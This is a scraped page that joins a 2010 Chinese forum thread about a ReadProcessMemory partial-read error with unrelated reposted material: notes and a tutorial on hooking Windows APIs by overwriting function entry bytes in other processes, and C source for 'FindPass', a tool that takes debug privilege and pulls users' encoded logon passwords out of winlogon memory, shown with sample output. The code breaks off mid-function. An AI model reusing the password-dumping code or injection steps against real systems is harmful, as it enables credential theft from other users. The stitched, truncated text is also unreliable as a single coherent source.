调用ReadProcessMemory 0x0000012B

Baesky 2010-09-11 08:27:06
访问权限给的是READ,没用write
连续扫描全局地址就没事,间隔的读取不连续的空间就有问题.
...全文
536 6 打赏 收藏 转发到动态 举报
写回复
用AI写文章
6 条回复
切换为时间正序
请发表友善的回复…
发表回复
Baesky 2010-09-30
  • 打赏
  • 举报
回复
[Quote=引用 5 楼 zhanshen2891 的回复:]

你怎么知道值有改变的部分的?
[/Quote]
写的有代码算法啊~
zhanshen2891 2010-09-14
  • 打赏
  • 举报
回复
你怎么知道值有改变的部分的?
Baesky 2010-09-14
  • 打赏
  • 举报
回复
绝对的求救!
Baesky 2010-09-13
  • 打赏
  • 举报
回复
哪位知道?
Baesky 2010-09-11
  • 打赏
  • 举报
回复
写了个内存扫描器,我第一扫全局范围(0x00000000~0x7fffffff)连续的扫,能读出来值没问题,后来某进程数据改编后我再扫描,这个时候我只扫描值有改变的部分,就出现问题了,GetLastError每次都报0x0000012B这个错误,查ErrLookUp得知说是"仅完成部分的 ReadProcessMemory 或 WriteProcessMemory 请求。"
Eleven 2010-09-11
  • 打赏
  • 举报
回复
啥问题?
一、32位系统下函数重定向说明 原理:找到想要hook的函数在内存中的地址,将函数的头几个字节保存在自己的内存中,用jump cpu指令改写函数的头几个字节,该指令会转移到替换函数的内存地址,(替换函数必修和被hook的函数标记完全相同),当被hook的函数被调用时,jump指令实际上将转移到替换函数上执行,实现hook的目的。 具体实现方法: //修改API入口为 mov eax, 00400000;jmp eax使程序能跳转到自己的函数 BYTE g_bJumpTemplate[8] = { 0xB8, 0x0, 0x0, 0x40, 0x0, 0xFF, 0xE0, 0x0 };//第二到第五个字节将被替换为将要执行的函数的地址 1、找到MessageBox在内存中的地址(user32.dll中的MessageBoxW)(Kernel32.dll"中的 "CreateProcess") DWORD dwOldFuncAddr = (DWORD)GetProcAddress(hDll, cFuncName) ; 2、将函数的头8个字节读出并保存, 如保存到bOldJumpBytes中 ReadProcessMemory( hProcess, (void *)pHookApiInfo->dwOldFuncAddr, // pHookApiInfo->dwOldFuncAddr = dwOldFuncAddr (void *)pHookApiInfo->bOldJumpBytes, sizeof(DWORD)*2, NULL ) 3、用jump指令改写函数的头几个字节,指令会转移到要替换的函数的内存地址(替换函数必须和原函数标记完全相同,参数,返回值,调用规则必须一样) memcpy(pHookApiInfo->bNewJumpBytes, g_bJumpTemplate, 8) ; DWORD *pdwNewJumpAddr = (DWORD *)(pHookApiInfo->bNewJumpBytes + 1) ;//将要修改第2到第5个字节 memcpy(pdwNewJumpAddr, &dwNewFuncAddr, sizeof(DWORD)) ; 将替换函数地址写到原来函数开始的第2到第5个字节 // 将修改后的8个字节写回原来函数的地址中 if ( !WriteProcessMemory( hProcess, (void *)pHookApiInfo->dwOldFuncAddr, (void *)pHookApiInfo->bNewJumpBytes, sizeof(DWORD)*2, NULL ) ) { break ; } 以上即可实现函数的重定向,当系统调用messagebox时,则会执行到dwNewFuncAddr的函数中 取消挂载则是将保存的原来函数的前8个字节写回去即可。 缺点:在x 8 6、A l p h a和其他的C P U上的J U M P指令是不同的,必须使用手工编码的机器指令才能使这种方法生效,这种方法在抢占式多线程环境中也不适用 代码参考:hookapi_32 原文参考:windows核心编程第22章第9节
Windows用户层下拦截api的原理与实现(附源码) (2008-03-29 16:15:07)转载▼ 标签: computer 杂谈 声明:本页所发布的技术文章及其附件,供自由技术传播,拒绝商业使用。本页文章及其附件的所有权归属本文作者,任何使用文档中所介绍技术者对其后果自行负责,本文作者不对其承担任何责任。 Email:redcoder163.com 目录 1 摘要 2 win2000和xp的内存结构和进程地址空间 3 函数堆栈的一些知识 4 关于拦截的整体思路 5 附件代码下载以及说明 一:摘要 拦截api的技术有很多种,大体分为用户层和内核层的拦截.这里只说说用户层的拦截(内核层也可以用,关键是让你的拦截程序获得ring0特权).而用户层也分为许多种:修改PE文件导入表,直接修改要拦截的api的内存(从开始到最后,使程序跳转到指定的地址执行).不过大部分原理都是修改程序流程,使之跳转到你要执行的地方,然后再返回到原地址.原来api的功能必须还能实现.否则拦截就失去作用了.修改文件导入表的方法的缺点是如果用户程序动态加载(使用LoadLibrary和GetProcAddress函数),拦截将变得复杂一些.所以这里介绍一下第二种方法,直接修改api,当然不是全局的.(后面会说到)   需要了解的一些知识:   1.windows内存的结构属性和进程地址空间   2.函数堆栈的一些知识 二:win2000和xp的内存结构和进程地址空间 windows采用4GB平坦虚拟地址空间的做法。即每个进程单独拥有4GB的地址空间。每个进程只能访问自己的这4GB的虚拟空间,而对于其他进程的地址空间则是不可见的。这样保证了进程的安全性和稳定性。但是,这4GB的空间是一个虚拟空间,在使用之前,我们必须先保留一段虚拟地址,然后再为这段虚拟地址提交物理存储器。可是我们的内存大部分都还没有1GB,那么这4GB的地址空间是如何实现的呢?事实上windows采用的内存映射这种方法,即把物理磁盘当作内存来使用,比如我们打开一个可执行文件的时候,操作系统会为我们开辟这个4GB的地址空间:0x00000000--0xffffffff。其中0x00000000--0x7fffffff是属于用户层的空间.0x80000000--0xffffffff则属于共享内核方式分区,主要是操作系统的线程调度,内存管理,文件系统支持,网络支持和所有设备驱动程序。对于用户层的进程,这些地址空间是不可访问的。任何访问都将导致一个错误。开辟这4GB的虚拟地址空间之后,系统会把磁盘上的执行文件映射到进程的地址空间中去(一般是在地址0x00400000,可以通过修改编译选项来修改这个地址)而一个进程运行所需要的动态库文件则一般从0x10000000开始加载。但是如果所有的动态库都加载到这个位置肯定会引起冲突。因此必须对一些可能引起冲突的dll编译时重新修改基地址。但是对于所有的操作系统所提供的动态库windows已经定义好了映射在指定的位置。这个位置会随着版本的不同而会有所改变,不过对于同一台机器上的映射地址来说都是一样的。即在a进程里映射的kernel32.dll的地址和在进程b里的kernel32.dll的地址是一样的。对于文件映射是一种特殊的方式,使得程序不需要进行磁盘i/o就能对磁盘文件进行操作,而且支持多种保护属性。对于一个被映射的文件,主要是使用CreateFileMapping函数,利用他我们可以设定一些读写属性:PAGE_READONLY,PAGE_READWRITE,PAGE_WRITECOPY.第一参数指定只能对该映射文件进行读操作。任何写操作将导致内存访问错误。第二个参数则指明可以对映射文件进行读写。这时候,任何对文件的读写都是直接操作文件的。而对于第三个参数PAGE_WRITECOPY顾名思义就是写入时拷贝,任何向这段内存写入的操作(因为文件是映射到进程地址空间的,对这段空间的读写就相当于对文件进行的直接读写)都将被系统捕获,并重新在你的虚拟地址空间重新保留并分配一段内存,你所写入的一切东西都将在这里,而且你原先的指向映射文件的内存地址也会实际指向这段重新分配的内存,于是在进程结束后,映射文件内容并没有改变,只是在运行期间在那段私有拷贝的内存里面存在着你修改的内容。windows进程运行所需要映射的一些系统dll就是以这种方式映射的,比如常用的ntdll.dll,kernel32.dll,gdi32.dll.几乎所有的进程都会加载这三个动态库。如果你在一个进程里修改这个映射文件的内容,并不会影响到其他的进程使用他们。你所修改的只是在本进程的地址空间之内的。事实上原始文件并没有被改变。 这样,在后面的修改系统api的时候,实际就是修改这些动态库地址内的内容。前面说到这不是修改全局api就是这个原因,因为他们都是以写入时拷贝的方式来映射的。不过这已经足够了,windows提供了2个强大的内存操作函数ReadProcessMemory和WriteProcessMemory.利用这两个函数我们就可以随便对任意进程的任意用户地址空间进行读写了。但是,现在有一个问题,我们该写什么,说了半天,怎么实现跳转呢?现在来看一个简单的例子: MessageBox(NULL, "World", "Hello", 0); 我们在执行这条语句的时候,调用了系统api MessageBox,实际上在程序中我没有定义UNICODE宏,系统调用的是MessageBox的ANSI版本MessageBoxA,这个函数是由user32.dll导出的。下面是执行这条语句的汇编代码: 0040102A push 0 0040102C push offset string "Hello" (0041f024) 00401031 push offset string "World" (0041f01c) 00401036 push 0 00401038 call dword ptr [__imp__MessageBoxA@16 (0042428c)] 前面四条指令分别为参数压栈,因为MessageBoxA是__stdcall调用约定,所以参数是从右往左压栈的。最后再CALL 0x0042428c 看看0042428c这段内存的值: 0042428C 0B 05 D5 77 00 00 00 可以看到这个值0x77d5050b,正是user32.dll导出函数MessageBoxA的入口地址。 这是0x77D5050B处的内容, 77D5050B 8B FF mov edi,edi 77D5050D 55 push ebp 77D5050E 8B EC mov ebp,esp 理论上只要改变api入口和出口的任何机器码,都可以拦截该api。这里我选择最简单的修改方法,直接修改qpi入口的前十个字节来实现跳转。为什么是十字节呢?其实修改多少字节都没有关系,只要实现了函数的跳转之后,你能把他们恢复并让他继续运行才是最重要的。在CPU的指令里,有几条指令可以改变程序的流程:JMP,CALL,INT,RET,RETF,IRET等指令。这里我选择CALL指令,因为他是以函数调用的方式来实现跳转的,这样可以带一些你需要的参数。到这里,我该说说函数的堆栈了。 总结:windows进程所需要的动态库文件都是以写入时拷贝的方式映射到进程地址空间中的。这样,我们只能拦截指定的进程。修改目标进程地址空间中的指定api的入口和出口地址之间的任意数据,使之跳转到我们的拦截代码中去,然后再恢复这些字节,使之能顺利工作。 三:函数堆栈的一些知识 正如前面所看到MessageBoxA函数执行之前的汇编代码,首先将四个参数压栈,然后CALL MessageBoxA,这时候我们的线程堆栈看起来应该是这样的: | | <---ESP |返回地址| |参数1| |参数2| |参数3| |参数4| |.. | 我们再看MessageBoxA的汇编代码, 77D5050B 8B FF mov edi,edi 77D5050D 55 push ebp 77D5050E 8B EC mov ebp,esp 注意到堆栈的操作有PUSH ebp,这是保存当前的基址指针,以便一会儿恢复堆栈后返回调用线程时使用,然后再有mov ebp,esp就是把当前esp的值赋给ebp,这时候我们就可以使用 ebp+偏移 来表示堆栈中的数据,比如参数1就可以表示成[ebp+8],返回地址就可以表示成[ebp+4]..如果我们在拦截的时候要对这些参数和返回地址做任何处理,就可以使用这种方法。如果这个时候函数有局部变量的话,就通过减小ESP的值的方式来为之分配空间。接下来就是保存一些寄存器:EDI,ESI,EBX.要注意的是,函数堆栈是反方向生长的。这时候堆栈的样子: |....| |EDI| <---ESP |ESI| |EBX| |局部变量| |EBP | |返回地址| |参数1| |参数2| |参数3| |参数4| |.. | 在函数返回的时候,由函数自身来进行堆栈的清理,这时候清理的顺序和开始入栈的顺序恰恰相反,类似的汇编代码可能是这样的: pop edi pop esi pop ebx add esp, 4 pop ebp ret 0010 先恢复那些寄存器的值,然后通过增加ESP的值的方式来释放局部变量。这里可以用mov esp, ebp来实现清空所有局部变量和其他一些空闲分配空间。接着函数会恢复EBP的值,利用指令POP EBP来恢复该寄存器的值。接着函数运行ret 0010这个指令。该指令的意思是,函数把控制权交给当前栈顶的地址的指令,同时清理堆栈的16字节的参数。如果函数有返回值的话,那在EAX寄存器中保存着当前函数的返回值。如果是__cdecl调用方式,则执行ret指令,对于堆栈参数的处理交给调用线程去做。如wsprintf函数。 这个时候堆栈又恢复了原来的样子。线程得以继续往下执行... 在拦截api的过程之中一个重要的任务就是保证堆栈的正确性。你要理清每一步堆栈中发生了什么。 四:形成思路 呵呵,不知道你现在脑海是不是有什么想法。怎么去实现拦截一个api? 这里给出一个思路,事实上拦截的方法真的很多,理清了一个,其他的也就容易了。而且上面所说的2个关键知识,也可以以另外的形式来利用。 我以拦截CreateFile这个api为例子来简单说下这个思路吧: 首先,既然我们要拦截这个api就应该知道这个函数在内存中的位置吧,至少需要知道从哪儿入口。CreateFile这个函数是由kernel32.dll这个动态库导出的。我们可以使用下面的方法来获取他映射到内存中的地址: HMODULE hkernel32 = LoadLibrary("Kernel32.dll"); PVOID dwCreateFile = GetProcAddress(hkernei32, "CreateFileA"); 这就可以得到createfile的地址了,注意这里是获取的createfile的ansic版本。对于UNICODE版本的则获取CreateFileW。这时dwCreateFile的值就是他的地址了。对于其他进程中的createfile函数也是这个地址,前面说过windows指定了他提供的所有的dll文件的加载地址。 接下来,我们该想办法实现跳转了。最简单的方法就是修改这个api入口处的代码了。但是我们该修改多少呢?修改的内容为什么呢?前面说过我们可以使用CALL的方式来实现跳转,这种方法的好处是可以为你的拦截函数提供一个或者多个参数。这里只要一个参数就足够了。带参数的函数调用的汇编代码是什么样子呢,前面也已经说了,类似与调用MessageBoxA时的代码: PUSH 参数地址 CALL 函数入口地址(这里为一个偏移地址) 执行这2条指令就能跳转到你要拦截的函数了,但是我们该修改成什么呢。首先,我们需要知道这2条指令的长度和具体的机器代码的值。其中PUSH对应0x68,而CALL指令对应的机器码为0xE8,而后面的则分别对应拦截函数的参数地址和函数的地址。注意第一个是一个直接的地址,而第二个则是一个相对地址。当然你也可以使用0xFF0x15这个CALL指令来进行直接地址的跳转。 下面就是计算这2个地址的值了, 对于参数和函数体的地址,要分情况而定,对于对本进程中api的拦截,则直接取地址就可以了。对于参数,可以先定义一个参数变量,然后取变量地址就ok了。 如果是想拦截其他进程中的api,则必须使用其他一些方法,最典型的方法是利用VirtualAllocEx函数来在其他进程中申请和提交内存空间。然后用WriteProcessMemory来分别把函数体和参数分别写入申请和分配的内存空间中去。然后再生成要修改的数据,最后用WriteProcessMemory来修改api入口,把入口的前10字节修改为刚刚生成的跳转数据。比如在远程进程中你写入的参数和函数体的内存地址分别为0x00010000和0x00011000,则生成的跳转数据为 68 00 00 01 00 E8 00 10 01 00(PUSH 00010000 CALL 00011000),这样程序运行createfile函数的时候将会先运行PUSH 00010000 CALL 00011000,这样就达到了跳转的目的。此刻我们应该时刻注意堆栈的状态,对于CreateFile有 HANDLE CreateFile( LPCTSTR lpFileName, DWORD dwDesiredAccess, DWORD dwShareMode, LPSECURITY_ATTRIBUTES lpSecurityAttributes, DWORD dwCreationDisposition, DWORD dwFlagsAndAttributes, HANDLE hTemplateFile ); 可以看到其有7个参数,于是在调用之前,堆栈应该已经被压入了这7个参数,堆栈的样子: |....| <---ESP |createfile执行后的下一条指令地址| |参数1| |参数2| |参数3| |参数4| |参数5| |参数6| |参数7| |..| 这是执行到我们的跳转语句:PUSH 00010000,于是堆栈又变了: |....| <---ESP |00010000| |createfile执行后的下一条指令地址| |参数1| |参数2| |参数3| |参数4| |参数5| |参数6| |参数7| |..| 接着执行CALL 00011000,堆栈变为: |...| <---ESP |api入口之后的第六个字节的指令的地址| |00010000| |createfile执行后的下一条指令地址| |参数1| |参数2| |参数3| |参数4| |参数5| |参数6| |参数7| |..| 接下来就到了我们的拦截函数中拉,当然,函数肯定也会做一些类似动作,把EBP压栈,为局部变量分配空间等。这时候堆栈的样子又变了: |EDI| <---ESP |ESI| |EBX| |局部变量| |EBP| dwMessageBox; pfnMessageBox(NULL, PFileName, PFileName, MB_ICONINFORMATION |MB_OK); //输出要打开的文件的路径..... } 对于你要使用的其他函数,都是使用同样的方式,利用这个参数来传递我们要传递的函数的绝对地址,然后定义这个函数指针,就可以使用了。 好了,接下来我们该让被拦截的api正常工作了,这个不难,把他原来的数据恢复一下就可以了。那入口的10个字节。我们在改写他们的时候应该保存一下,然后也把他放在参数中传递给拦截函数,呵呵,参数的作用可多了。接着我们就可以用WriteProcessMemory函数来恢复这个api的入口了,代码如下: PFN_GETCURRENTPROCESS pfnGetCurrentProcess = (PFN_GETCURRENTPROCESS)pRP->dwGetCurrentProcess; PFN_WRITEPROCESSMEMORY pfnWriteProcessMemory = (PFN_WRITEPROCESSMEMORY)pRP->dwWriteProcessMemory; if(!pfnWriteProcessMemory(pfnGetCurrentProcess(), (LPVOID)pfnConnect, (LPCVOID)pRP->szOldCode, 10, NULL)) pfnMessageBox(NULL, pRP->szModuleName1, pRP->szModuleName2, MB_ICONINFORMATION | MB_OK); 其中这些函数指针的定义和上面的类似。 而参数中的szoldcode则是在源程序中在修改api之前保存好,然后传给拦截函数,在源程序中是用ReadProcessMemory函数来获取他的前10个字节的: ReadProcessMemory(GetCurrentProcess(), (LPCVOID)RParam.dwCreateFile, oldcode, 10, &dwPid) strcat((char*)RParam.szOldCode, (char*)oldcode); 接下来如果你还继续保持对该api的拦截,则又该用WriteProcessMemory 来修改入口了,跟前面的恢复入口是一样的,只不过把szOldCode换成了szNewCode了而已。这样你又能对CreateFile继续拦截了。 好了,接下来该进行堆栈的清理了,也许你还要做点其他事情,尽管做去。但是清理堆栈是必须要做的,在函数结束的时候,因为在我们放任api恢复执行之后,他又return 到我们的函数中来了,这个时候的堆栈是什么样子呢? |EDI| <---ESP |ESI| |EBX| |局部变量| |EBP| <---EBP |api入口之后的第六个字节的指令的地址| |00010000| |createfile执行后的下一条指令地址| |参数1| |参数2| |参数3| |参数4| |参数5| |参数6| |参数7| |..| 我们的目标是把返回值记录下来放到EAX寄存器中去,把返回地址记录下来,同时把堆栈恢复成原来的样子。 首先我们恢复那些寄存器的值,接着释放局部变量,可以用mov esp, ebp.因为我们不清楚具体的局部变量分配了多少空间。所以使用这个方法。 __asm {POP EDI POP ESI POP EBX //恢复那些寄存器 MOV EDX, [NextIpAddr]//把返回地址放到EDX中,因为待会儿 //EBP被恢复后,线程中的所有局部变量就不能正常使用了。 MOV EAX, [RetValue]//返回值放到EAX中,当然也可以修改这个返回值 MOV ESP, EBP//清理局部变量 POP EBP//恢复EBP的值 ADD ESP, 28H //清理参数和返回地址,注意一共(7+1+1+1)*4 PUSH EDX //把返回地址压栈,这样栈中就只有这一个返回地址了,返回之后栈就空了 RET } 这样,一切就完成了,堆栈恢复了应该有的状态,而你想拦截的也拦截到了。 五:后记 拦截的方式多种多样,不过大体的思路却都相同。要时刻注意你要拦截的函数的堆栈状态以及在拦截函数中的对数据的引用和函数的调用(地址问题)。
// Find Password from winlogon in win2000 / winnt4 + < sp6 // // PasswordReminder.cpp --> FindPass.cpp // 1. http://www.smidgeonsoft.com/ // 2. shotgun add comment, bingle change a little to find other user in winlogon // This code is licensed under the terms of the GPL (gnu public license). // // Usage: FindPass DomainName UserName PID-of-WinLogon // // you can get the three params from pulist output in target system. // /* 因为登陆的域名和用户名是明文存储在winlogon进程里的,而PasswordReminder是限定了查找本进程用户的密码 <167-174: GetEnvironmentVariableW(L"USERNAME", UserName, 0x400); GetEnvironmentVariableW (L"USERDOMAIN", UserDomain, 0x400); >,然后到winlogon进程的空间中查找UserDomain和UserName < 590:// 在WinLogon的内存空间中寻找UserName和DomainName的字符串 if ((wcscmp ((wchar_t *) RealStartingAddressP, UserName) == 0) && (wcscmp ((wchar_t *) ((DWORD) RealStartingAddressP + USER_DOMAIN_OFFSET_WIN2K), UserDomain) == 0)) > ,找到后就查后边的加密口令。 其实只要你自己指定用户名和winlogon进程去查找就行了,只要你是管理员,任何本机用msgina.dll图形登陆的用户口令都可以找到。 1. pulist,找到系统里登陆的域名和用户名,及winlogon进程id 2. 然后给每个winlogon进程id查找指定的用户就行了。 example: C:\Documents and Settings\bingle>pulist Process PID User Idle 0 System 8 smss.exe 164 NT AUTHORITY\SYSTEM csrss.exe 192 NT AUTHORITY\SYSTEM winlogon.exe 188 NT AUTHORITY\SYSTEM wins.exe 1212 NT AUTHORITY\SYSTEM Explorer.exe 388 TEST-2KSERVER\Administrator internat.exe 1828 TEST-2KSERVER\Administrator conime.exe 1868 TEST-2KSERVER\Administrator msiexec.exe 1904 NT AUTHORITY\SYSTEM tlntsvr.exe 1048 NT AUTHORITY\SYSTEM taskmgr.exe 1752 TEST-2KSERVER\Administrator csrss.exe 2056 NT AUTHORITY\SYSTEM winlogon.exe 2416 NT AUTHORITY\SYSTEM rdpclip.exe 2448 TEST-2KSERVER\clovea Explorer.exe 2408 TEST-2KSERVER\clovea internat.exe 1480 TEST-2KSERVER\clovea cmd.exe 2508 TEST-2KSERVER\Administrator ntshell.exe 368 TEST-2KSERVER\Administrator ntshell.exe 1548 TEST-2KSERVER\Administrator ntshell.exe 1504 TEST-2KSERVER\Administrator csrss.exe 1088 NT AUTHORITY\SYSTEM winlogon.exe 1876 NT AUTHORITY\SYSTEM rdpclip.exe 1680 TEST-2KSERVER\bingle Explorer.exe 2244 TEST-2KSERVER\bingle conime.exe 2288 TEST-2KSERVER\bingle internat.exe 1592 TEST-2KSERVER\bingle cmd.exe 1692 TEST-2KSERVER\bingle mdm.exe 2476 TEST-2KSERVER\bingle taskmgr.exe 752 TEST-2KSERVER\bingle pulist.exe 2532 TEST-2KSERVER\bingle C:\Documents and Settings\bingle>D:\FindPass.exe TEST-2KSERVER administrator 188 To Find Password in the Winlogon process Usage: D:\FindPass.exe DomainName UserName PID-of-WinLogon The debug privilege has been added to PasswordReminder. The WinLogon process id is 188 (0x000000bc). To find TEST-2KSERVER\administrator password in process 188 ... The encoded password is found at 0x008e0800 and has a length of 10. The logon information is: TEST-2KSERVER/administrator/testserver. The hash byte is: 0x13. C:\Documents and Settings\bingle>D:\FindPass.exe TEST-2KSERVER clovea 1876 To Find Password in the Winlogon process Usage: D:\FindPass.exe DomainName UserName PID-of-WinLogon The debug privilege has been added to PasswordReminder. The WinLogon process id is 1876 (0x00000754). To find TEST-2KSERVER\clovea password in process 1876 ... PasswordReminder is unable to find the password in memory. C:\Documents and Settings\bingle>D:\FindPass.exe TEST-2KSERVER bingle 1876 To Find Password in the Winlogon process Usage: D:\FindPass.exe DomainName UserName PID-of-WinLogon The debug privilege has been added to PasswordReminder. The WinLogon process id is 1876 (0x00000754). To find TEST-2KSERVER\bingle password in process 1876 ... The logon information is: TEST-2KSERVER/bingle. There is no password. C:\Documents and Settings\bingle>D:\FindPass.exe TEST-2KSERVER clovea 2416 To Find Password in the Winlogon process Usage: D:\FindPass.exe DomainName UserName PID-of-WinLogon The debug privilege has been added to PasswordReminder. The WinLogon process id is 2416 (0x00000970). To find TEST-2KSERVER\clovea password in process 2416 ... The logon information is: TEST-2KSERVER/clovea. There is no password. C:\Documents and Settings\bingle> */ #include #include #include #include #include typedef struct _UNICODE_STRING { USHORT Length; USHORT MaximumLength; PWSTR Buffer; } UNICODE_STRING, *PUNICODE_STRING; // Undocumented typedef's typedef struct _QUERY_SYSTEM_INFORMATION { DWORD GrantedAccess; DWORD PID; WORD HandleType; WORD HandleId; DWORD Handle; } QUERY_SYSTEM_INFORMATION, *PQUERY_SYSTEM_INFORMATION; typedef struct _PROCESS_INFO_HEADER { DWORD Count; DWORD Unk04; DWORD Unk08; } PROCESS_INFO_HEADER, *PPROCESS_INFO_HEADER; typedef struct _PROCESS_INFO { DWORD LoadAddress; DWORD Size; DWORD Unk08; DWORD Enumerator; DWORD Unk10; char Name [0x108]; } PROCESS_INFO, *PPROCESS_INFO; typedef struct _ENCODED_PASSWORD_INFO { DWORD HashByte; DWORD Unk04; DWORD Unk08; DWORD Unk0C; FILETIME LoggedOn; DWORD Unk18; DWORD Unk1C; DWORD Unk20; DWORD Unk24; DWORD Unk28; UNICODE_STRING EncodedPassword; } ENCODED_PASSWORD_INFO, *PENCODED_PASSWORD_INFO; typedef DWORD (__stdcall *PFNNTQUERYSYSTEMINFORMATION) (DWORD, PVOID, DWORD, PDWORD); typedef PVOID (__stdcall *PFNRTLCREATEQUERYDEBUGBUFFER) (DWORD, DWORD); typedef DWORD (__stdcall *PFNRTLQUERYPROCESSDEBUGINFORMATION) (DWORD, DWORD, PVOID); typedef void (__stdcall *PFNRTLDESTROYQUERYDEBUGBUFFER) (PVOID); typedef void (__stdcall *PFNTRTLRUNDECODEUNICODESTRING) (BYTE, PUNICODE_STRING); // Private Prototypes BOOL IsWinNT (void); BOOL IsWin2K (void); BOOL AddDebugPrivilege (void); DWORD FindWinLogon (void); BOOL LocatePasswordPageWinNT (DWORD, PDWORD); BOOL LocatePasswordPageWin2K (DWORD, PDWORD); void DisplayPasswordWinNT (void); void DisplayPasswordWin2K (void); // Global Variables PFNNTQUERYSYSTEMINFORMATION pfnNtQuerySystemInformation; PFNRTLCREATEQUERYDEBUGBUFFER pfnRtlCreateQueryDebugBuffer; PFNRTLQUERYPROCESSDEBUGINFORMATION pfnRtlQueryProcessDebugInformation; PFNRTLDESTROYQUERYDEBUGBUFFER pfnRtlDestroyQueryDebugBuffer; PFNTRTLRUNDECODEUNICODESTRING pfnRtlRunDecodeUnicodeString; DWORD PasswordLength = 0; PVOID RealPasswordP = NULL; PVOID PasswordP = NULL; DWORD HashByte = 0; wchar_t UserName [0x400]; wchar_t UserDomain [0x400]; int __cdecl main( int argc, char* argv[] ) { printf( "\n\t To Find Password in the Winlogon process\n" ); printf( " Usage: %s DomainName UserName PID-of-WinLogon\n\n", argv[0] ); if ((!IsWinNT ()) && (!IsWin2K ())) { printf ("Windows NT or Windows 2000 are required.\n"); return (0); } // Add debug privilege to PasswordReminder - // this is needed for the search for Winlogon. // 增加PasswordReminder的权限 // 使得PasswordReminder可以打开并调试Winlogon进程 if (!AddDebugPrivilege ()) { printf ("Unable to add debug privilege.\n"); return (0); } printf ("The debug privilege has been added to PasswordReminder.\n"); // 获得几个未公开API的入口地址 HINSTANCE hNtDll = LoadLibrary ("NTDLL.DLL"); pfnNtQuerySystemInformation = (PFNNTQUERYSYSTEMINFORMATION) GetProcAddress (hNtDll, "NtQuerySystemInformation"); pfnRtlCreateQueryDebugBuffer = (PFNRTLCREATEQUERYDEBUGBUFFER) GetProcAddress (hNtDll, "RtlCreateQueryDebugBuffer"); pfnRtlQueryProcessDebugInformation = (PFNRTLQUERYPROCESSDEBUGINFORMATION) GetProcAddress (hNtDll, "RtlQueryProcessDebugInformation"); pfnRtlDestroyQueryDebugBuffer = (PFNRTLDESTROYQUERYDEBUGBUFFER) GetProcAddress (hNtDll, "RtlDestroyQueryDebugBuffer"); pfnRtlRunDecodeUnicodeString = (PFNTRTLRUNDECODEUNICODESTRING) GetProcAddress (hNtDll, "RtlRunDecodeUnicodeString"); // Locate WinLogon's PID - need debug privilege and admin rights. // 获得Winlogon进程的PID // 这里作者使用了几个Native API,其实使用PSAPI一样可以 DWORD WinLogonPID = argc > 3 ? atoi( argv[3] ) : FindWinLogon () ; if (WinLogonPID == 0) { printf ("PasswordReminder is unable to find WinLogon or you are using NWGINA.DLL.\n"); printf ("PasswordReminder is unable to find the password in memory.\n"); FreeLibrary (hNtDll); return (0); } printf("The WinLogon process id is %d (0x%8.8lx).\n", WinLogonPID, WinLogonPID); // Set values to check memory block against. // 初始化几个和用户账号相关的变量 memset(UserName, 0, sizeof (UserName)); memset(UserDomain, 0, sizeof (UserDomain)); if( argc > 2 ) { mbstowcs( UserName, argv[2], sizeof(UserName)/sizeof(*UserName) ); mbstowcs( UserDomain, argv[1], sizeof(UserDomain)/sizeof(*UserDomain) ); }else { GetEnvironmentVariableW(L"USERNAME", UserName, 0x400); GetEnvironmentVariableW(L"USERDOMAIN", UserDomain, 0x400); } printf( " To find %S\\%S password in process %d ...\n", UserDomain, UserName, WinLogonPID ); // Locate the block of memory containing // the password in WinLogon's memory space. // 在Winlogon进程中定位包含Password的内存块 BOOL FoundPasswordPage = FALSE; if (IsWin2K ()) FoundPasswordPage = LocatePasswordPageWin2K (WinLogonPID, &PasswordLength); else FoundPasswordPage = LocatePasswordPageWinNT (WinLogonPID, &PasswordLength); if (FoundPasswordPage) { if (PasswordLength == 0) { printf ("The logon information is: %S/%S.\n", UserDomain, UserName); printf ("There is no password.\n"); } else { printf ("The encoded password is found at 0x%8.8lx and has a length of %d.\n", RealPasswordP, PasswordLength); // Decode the password string. if (IsWin2K ()) DisplayPasswordWin2K (); else DisplayPasswordWinNT (); } } else printf ("PasswordReminder is unable to find the password in memory.\n"); FreeLibrary (hNtDll); return (0); } // main // // IsWinNT函数用来判断操作系统是否WINNT // BOOL IsWinNT (void) { OSVERSIONINFO OSVersionInfo; OSVersionInfo.dwOSVersionInfoSize = sizeof (OSVERSIONINFO); if (GetVersionEx (&OSVersionInfo)) return (OSVersionInfo.dwPlatformId == VER_PLATFORM_WIN32_NT); else return (FALSE); } // IsWinNT // // IsWin2K函数用来判断操作系统是否Win2K // BOOL IsWin2K (void) { OSVERSIONINFO OSVersionInfo; OSVersionInfo.dwOSVersionInfoSize = sizeof (OSVERSIONINFO); if (GetVersionEx (&OSVersionInfo)) return ((OSVersionInfo.dwPlatformId == VER_PLATFORM_WIN32_NT) && (OSVersionInfo.dwMajorVersion == 5)); else return (FALSE); } // IsWin2K // // AddDebugPrivilege函数用来申请调试Winlogon进程的特权 // BOOL AddDebugPrivilege (void) { HANDLE Token; TOKEN_PRIVILEGES TokenPrivileges, PreviousState; DWORD ReturnLength = 0; if (OpenProcessToken (GetCurrentProcess (), TOKEN_QUERY | TOKEN_ADJUST_PRIVILEGES, &Token)) if (LookupPrivilegeValue (NULL, "SeDebugPrivilege", &TokenPrivileges.Privileges[0].Luid)) { TokenPrivileges.PrivilegeCount = 1; TokenPrivileges.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; return (AdjustTokenPrivileges (Token, FALSE, &TokenPrivileges, sizeof (TOKEN_PRIVILEGES), &PreviousState, &ReturnLength)); } return (FALSE); } // AddDebugPrivilege // // Note that the following code eliminates the need // for PSAPI.DLL as part of the executable. // FindWinLogon函数用来寻找WinLogon进程 // 由于作者使用的是Native API,因此不需要PSAPI的支持 // DWORD FindWinLogon (void) { #define INITIAL_ALLOCATION 0x100 DWORD rc = 0; DWORD SizeNeeded = 0; PVOID InfoP = HeapAlloc (GetProcessHeap (), HEAP_ZERO_MEMORY, INITIAL_ALLOCATION); // Find how much memory is required. pfnNtQuerySystemInformation (0x10, InfoP, INITIAL_ALLOCATION, &SizeNeeded); HeapFree (GetProcessHeap (), 0, InfoP); // Now, allocate the proper amount of memory. InfoP = HeapAlloc (GetProcessHeap (), HEAP_ZERO_MEMORY, SizeNeeded); DWORD SizeWritten = SizeNeeded; if (pfnNtQuerySystemInformation (0x10, InfoP, SizeNeeded, &SizeWritten)) { HeapFree (GetProcessHeap (), 0, InfoP); return (0); } DWORD NumHandles = SizeWritten / sizeof (QUERY_SYSTEM_INFORMATION); if (NumHandles == 0) { HeapFree (GetProcessHeap (), 0, InfoP); return (0); } PQUERY_SYSTEM_INFORMATION QuerySystemInformationP = (PQUERY_SYSTEM_INFORMATION) InfoP; DWORD i; for (i = 1; i <= NumHandles; i++) { // "5" is the value of a 